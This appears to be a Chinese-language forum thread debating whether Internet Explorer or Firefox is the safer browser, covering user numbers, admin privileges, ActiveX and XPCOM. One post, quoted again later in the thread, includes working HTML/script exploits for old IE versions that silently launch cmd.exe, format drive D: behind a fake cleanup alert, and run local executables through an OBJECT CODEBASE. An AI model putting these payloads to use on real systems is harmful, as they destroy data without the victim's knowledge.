效率和性能方面，要靠实际事实说话，而不是理论。至于说

这个也是IE fans的经典论调，FX现在全世界范围的用户也有几千万吧，一个软件几千万人用和一个一亿人用发现的Bug会有很大的差距吗？而IE现在的毛病不断只能说明IE的架构和设计是多么的垃圾

FF 下载量是有几千万，但下载量和用户人数无直接关系。FF 每次更新现有用户大都会更新吧？下载量当然会上升了。如果 IE 每次补丁都推出新版本给用户下载，IE 的下载量相信比全球人口还要高。

使用的人多，出现问题的机会较高，这是常理。当然 FF 可能像 apache 那样打破常理，但 FF 未到那阶段，猜测争论是无谓的，如果 FF 的使用量能与 IE 相约，到时自有分晓。

fiag：

我也有些觉得此文作者有挂羊头卖狗肉之嫌，技术上讲的不够深入，不够客观，主观臆测的比较多。回到原帖

作为会员，希望看到版主有实质内容的回帖，而不是空泛的 me too。

某些人有被害妄想症，看到不合自己胃口的文章，你可以驳斥，但也别动不动扯到“枪手”，这已经涉及到人身伤害了。

PS:回复hh9527,与FF无关,大家请略过

hh9527：感谢各位批评，因为批评的话也要先阅读，各位阅读了，自然我“只顾眼球（人气）利益”的不良企图的就已经实现了

看到有人说我是：“王翌搞的部分准枪手文”，但我实在不知道“王翌”是谁，于是 google 了一下，才知道他是一名嘴，但我的确是才接触 blog 不久，刚开始玩玩的，怎么就成了他的枪手？有趣的是在搜索过程中看到了“王翌是不是枪手？”的文章
标题，呵呵，原来他也被认为是枪手，那我岂不成了枪手的枪手了？回到原帖

1.我认为枪手文和枪手不能绝对直接划等号
注意:我说的是王翌搞过准枪手文,如果我认为他是真正的枪手没必要再加"准"
"王翌是不是枪手?":我没说他是,只是说他写过准枪手文
他的枪手?请指出我那帖哪里说了你是帮王翌放枪的?

2.那帖已修改,等待你的评论

很简单的回楼主以及abc@home一句
 
一套正版WinXp捆绑的IE6是多少钱?
一套Linux+Firefox是多少钱?

Zene：
撑着眼睛说瞎话，一个软件因为自己的设计缺陷而导致用户在安全上的威胁和损失，不是IE的错，还是用户的错不成，说错，就错在我不该用IE。回到原帖

虽然我不喜欢用 IE，但这的确不是 IE 的错！因为基于 XPCOM 的 Firefox 同样会受到这样的困扰，3721 可以为 IE 做一个邪恶的 ActiveX，同样也可以为 Firefox 做类似的事情，这在技术上是一样的。你想象一下：如果你在使用了 Firefox 访问网页时，弹出 3721 安装的提示，然后利用 XPCOM，把你的系统搞的乱七八糟，你是不是也要骂 Firefox 呢？不要因为现在没有 3721 for Firefox 就认定 Firefox 有多么安全，因为技术上别说 3721 for Firefox，即使 AUTO-FORMAT for Firefox 都同样是可行的。

如果要真的说错，那么错的是大多数 Windows 用户的不安全做法：大多数 Windows 用户都是用 administrator 或类似权限的用户来做日常的事情，这本身赋予了他不安全的基础。在 UNIX 领域，这是不可想象的，你看见过一个 UNIX 的用户没事拿 root 用户在系统里搞来搞去么？如果这样的话，UNIX 也比 WINDOWS 安全不到哪里去。

浏览器里运行的 HTML / javscript 代码一般情况下都是在一个安全的沙箱里运行，不能访问本地资源，这是浏览器安全的基础。但这同样会使许多网络应用无法实现，所以浏览器会开一个后门，这就是 ActiveX 或者 XPCOM，只要用户许可了这个后门，它就可以突破浏览器的沙箱限制，在操作系统的权限内做任何事情。这一点来说 IE 和 Firefox 都一样，目前网络针对 Firefox 的恶意程序比较少，这是目前 Firefox 比 IE  更安全的一个原因，但这并不代表从技术上 Firefox 就比 IE 的机制更安全。机制的安全是指“不能做非法的事情”，而不是“不去做非法的事情”，否则浏览器的安全就只能靠 3721 这类产品的良心发现了。从这点上来说：所有提供能访问本地资源的扩展/插件的浏览器都是不安全的。这也是为什么 Firefox 和 IE 都要提供了插件的数字签名管理，确保用户知道他许可的扩展/插件是什么，然后让用户自己承担使用它的风险。

除此之外还有就是如果使用权限很低的用户（例如只有访问很少资源的权限）来浏览，也会改善浏览器的安全性：即使插件突破了浏览器沙箱的限制，还是会被操作系统限制在较为安全的环境中。

当然我所说的都是机制上的问题，而不是具体软件 BUG 的问题，我只是想说明：丛机制上来看，IE 和 Firefox 的安全性相当。至于软件 BUG 的问题，我想无论是 IE 和 Firefox 都有，关键看谁能快速反映修正这些 BUG。

　　这个ActiveX漏洞主要针对IE5.5(含)及其以下版本，对OE、Outlook、Foxmail等也有着巨大的威胁。概况说来，就是把 com.ms.activeX.ActiveXComponent对象嵌入<APPLET>标记可能导致任意创建和解释执行ActiveX对象，从而可以创建任意文件，运行程序，写注册表。举个例子，在嵌入com.ms.activeX.ActiveXComponent对象后，在IE的默认安全级别“中”状态下，打开包含以下脚本的HTML文件也会运行一个命令提示符，但没有任何警告。甚至还可以使程序在后台运行，这就要“归功”于嵌入的 com.ms.activeX.ActiveXComponent对象了，正是它导演了这一幕！具体代码如下：

<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>
<SCRIPT>
function runcmd()
{
a=document.applets[0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
wsh=a.GetObject();
wsh.Run('cmd.exe');//改为"wsh.Run('cmd.exe',false,1);"则程序在后台隐藏运行
}
setTimeout('runcmd()',10);
</SCRIPT>

　　运行的结果会打开一个命令提示符，但整个运行过程中没有任何提示。如果你还没有意识到这有多么危险，那么请你注意了，如果我们把将上面的代码“wsh.Run('cmd.exe');”改为下面这两句（其它的不变）：

wsh.Run('start/m format.com d:/q/autotest/u');
alert('IMPORTANT : Windows is removing unused temporary files.');

　　这样做的结果又会怎么样呢？呵呵，你的D盘要被格式化了！听到硬盘狂响，大多数人会以为Windows正在移除临时文件，因为屏幕上显示： IMPORTANT: Windows is removing unused temporary files.，其实这是个幌子，用来欺骗我们的！此时在后台进行的是格式化硬盘命令！等到发觉则悔之晚矣……

　　对于使用IE6.0的用户来说有个可怕的漏洞，该漏洞的存在导致可以在网页中执行任何程序，并可以绕过IE的ActiveX安全设置，即便你禁用ActiveX控件，网页中的恶意程序照样可以运行！举个例子，如果网页中含有下列代码，可以无声无息地执行你的记事本程序！想想看，如果这里不是记事本程序，换作其他的程序会怎么样？代码如下：

<body></body>
<SCRIPT>
html='<OBJECT CLASSID="CLSID:12345678" '
html+=' CODEBASE="c:/windows/notepad.exe"></OBJECT>';
/注意：上面的notepad.exe的路径请修改为你系统对应的路径document.body.innerHTML=html;
</SCRIPT>

　　这个漏洞的主要原因是IE安全设置都是针对非本地的页面或交互的，对于本地的安全设置IE是最大信任的。如果你注意看IE的安全设置，都是对 Internet和Intranet上WEB服务器而言的，根本就没有对本地文件的安全设置。概括说来就是IE对本地安全采用最大信任原则。

这样说起来，什么都是假的，添加新功能才是真的，例如支持png、svg。

不过呢，对我来说新支持的那些格式很少有机会用到。现阶段，firefox简洁、优美、安全，这样的理由就足够了。

Brain1127：很简单的回楼主以及abc@home一句
 
一套正版WinXp捆绑的IE6是多少钱?
一套Linux+Firefox是多少钱?回到原帖

现在讨论的是产品质数，不是产品价格。如果说 linux+firefox 有较高 performance/price ratio，我 100% 同意。

不小心用菜刀切到手指，也是菜刀的错？

菜刀割手指不是错，但如果一把菜刀造的锋利无比，又不给你加一个刀套，这个割断手指不能说没菜刀的过吧？就像套套破了一样，你会怪谁？怪自己太用力，用了太久，量太多？电饭锅爆炸了，你难道怪自己？产品缺陷就是缺陷，没有什么好推脱的，IE是干啥？浏览网页的，自然就应该知道网上有什么东西而防止用户遭受损失！

我由96年开始上网，从未在 IE 感染过病毒

那么多的恶意代码和莫名其妙的软件中国的网民恐怕谁都领教过吧！难道中国网民都有你这么好运和高计算机水平？

在我这里(winxp)裸体 FF 启用时间也比 IE 长一倍有多

我这里没有说启动速度的事，IE不就是占了系统捆绑的光吗？找个没有IE的Win来比比看。

知不知 mozilla 产品有多少确认的 bug？

总比IE好

事实上在不少测试中 gecko 的速度还不及 trident

莫非是pcpop的评测，不过我只是奇怪，IE那为什么不写的快一点，难道这个也交给扩展去做？

FF 下载量是有几千万，但下载量和用户人数无直接关系。

这句话我赞成，不过不知道多少人是从官方网站上下的，多少人是从其他地方下载的。看看那个FX在欧洲的占有率吧。

viewtheard：　　这个ActiveX漏洞主要针对IE5.5(含)及其以下版本，对OE、Outlook、Foxmail等也有着巨大的威胁。概况说来，就是把 com.ms.activeX.ActiveXComponent对象嵌入<APPLET>标记可能导致任意创建和解释执行ActiveX对象，从而可以创建任意文件，运行程序，写注册表。举个例子，在嵌入com.ms.activeX.ActiveXComponent对象后，在IE的默认安全级别“中”状态下，打开包含以下脚本的HTML文件也会运行一个命令提示符，但没有任何警告。甚至还可以使程序在后台运行，这就要“归功”于嵌入的 com.ms.activeX.ActiveXComponent对象了，正是它导演了这一幕！具体代码如下：

<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>
<SCRIPT>
function runcmd()
{
a=document.applets[0];
a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
a.createInstance();
wsh=a.GetObject();
wsh.Run('cmd.exe');//改为"wsh.Run('cmd.exe',false,1);"则程序在后台隐藏运行
}
setTimeout('runcmd()',10);
</SCRIPT>

　　运行的结果会打开一个命令提示符，但整个运行过程中没有任何提示。如果你还没有意识到这有多么危险，那么请你注意了，如果我们把将上面的代码“wsh.Run('cmd.exe');”改为下面这两句（其它的不变）：

wsh.Run('start/m format.com d:/q/autotest/u');
alert('IMPORTANT : Windows is removing unused temporary files.');

　　这样做的结果又会怎么样呢？呵呵，你的D盘要被格式化了！听到硬盘狂响，大多数人会以为Windows正在移除临时文件，因为屏幕上显示： IMPORTANT: Windows is removing unused temporary files.，其实这是个幌子，用来欺骗我们的！此时在后台进行的是格式化硬盘命令！等到发觉则悔之晚矣……回到原帖

在 activex 的帖子已经说过，这里不重复了：
[quote="abc@home"]...
针对 activex 漏洞是有，但早已堵塞。近年 IE 的漏洞主要都是源于 IE 对输入没有足够的验证，造成跨 security zones 操作，或是传统的 buffer overflow，造成任意执行代码的机会。
...
[/quote]
如果用户仍使用 IE 5.5，建议尽快升级到 IE 6.0 及打齐所有安全保丁(即使是 FF 用户，也会有需要使用 IE 的时候)。

我由96年开始上网，从未在 IE 感染过病毒，安装过任何 adware/spyware。可以说我好运，但网上安全不是单靠软件技术，用户安全意识及使用技巧同样重要。

谁更重要？
用IE中毒比例和可能性大还是Firefox？往下说又是软件设计架构的健康性问题了，
这个我相信你不是没听过的。

让正版用户升级浏览器显然是不明智的。IE 6.0的漏洞出现后如果MS只在IE7.0上修补的话。那么用户则必须跟着升级操作系统，那将会给用户造成很大经济负担的说。IE 6以下的版本的在不少中小企业仍在使用的情况

看看那个FX在欧洲的占有率吧。

这个占有率清楚的反衬了中国盗版市场深厚造成的恶果。
另外还有很重要的一点：国外的思想就是比较容易接受新事物，
拿ATI的X800来说，中国还是测评室写点文章来让大家yy的时候，法国
这边年轻人打CS就一窝蜂配上了X800，智能手机，等离子电视，都
很快的普及。

加上欧美电子货币的普及，大部分支付是通过信用卡在网络上进行的，
安全性的问题绝对让Firefox博得用户青睐。